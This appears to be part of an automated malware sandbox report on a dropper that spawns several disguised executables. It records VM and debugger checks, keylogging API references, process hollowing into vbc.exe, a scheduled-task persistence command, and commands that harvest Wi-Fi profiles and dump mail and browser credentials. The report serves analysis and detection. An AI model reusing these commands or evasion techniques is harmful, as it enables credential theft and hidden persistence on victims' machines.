Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: LOGO AND PICTURES.exe, 00000009.00000003.517546136.000000000489B000.00000004.00000001.sdmp	Binary or memory string: urrvPvzm3HwXvz1NTwLxXNfnvExFnrNIx7UVm/SmCD+FCHqemutVR/rFgT0wki9LPwg/
Source: LOGO AND PICTURES.exe, 00000009.00000002.616596730.00000000042BB000.00000004.00000001.sdmp	Binary or memory string: 5kJqdYbP21Rz2ptUM/x1qh7GFdJhiEB8hXnJNFU+GVEqzwoQhfmh2C9IQlQEMUDAfUYS
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: LOGO AND PICTURES.exe, 00000009.00000002.616596730.00000000042BB000.00000004.00000001.sdmp	Binary or memory string: fGg1mg3xoMngajQe6hGFSjiakAtVKJKH03ElOPVYoYRfwjC6jpmhdA54fgS3dC5Uyynp
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: LOGO AND PICTURES.exe, 00000009.00000003.517546136.000000000489B000.00000004.00000001.sdmp	Binary or memory string: /ggrd5oGq/eeB+sMqIUNhgFsPAZg07EA648E+MdwgDWHGNbGZeuOQEaRKAT4+5AGWOOZ
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: LOGO AND PICTURES.exe, 00000009.00000003.517546136.000000000489B000.00000004.00000001.sdmp	Binary or memory string: c6+yJD9ToI4EDZ/YK22zNFx6n1EdIvMQeMutryjDZdN2xTZa3ITFDcse9N7K29CuP/2N

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe

Code function: 9_2_03211C30 LdrInitializeThunk,KiUserExceptionDispatcher,

9_2_03211C30

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: Pictures.exe.8.dr, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: Pictures.exe.8.dr, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 10.0.Pictures.exe.150000.0.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 10.2.Pictures.exe.150000.0.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 16.0.PO2345714382021.exe.5d0000.0.unpack, A/b2.cs	Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000	Jump to behavior

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe 'C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe' 0	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\Pictures.exe 'C:\Users\user\AppData\Local\Temp\Pictures.exe' 0	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\PO456724392021.exe 'C:\Users\user\AppData\Local\Temp\PO456724392021.exe' 0	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Process created: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe 'C:\Users\user\AppData\Local\Temp\PO2345714382021.exe' 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'	Jump to behavior

Source: LOGO AND PICTURES.exe, 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: LOGO AND PICTURES.exe, 00000009.00000002.610812522.0000000001C70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: LOGO AND PICTURES.exe, 00000009.00000002.610812522.0000000001C70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: LOGO AND PICTURES.exe, 00000009.00000002.610812522.0000000001C70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: LOGO AND PICTURES.exe, 00000009.00000002.614076620.000000000348A000.00000004.00000001.sdmp	Binary or memory string: Program ManagerxQT

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
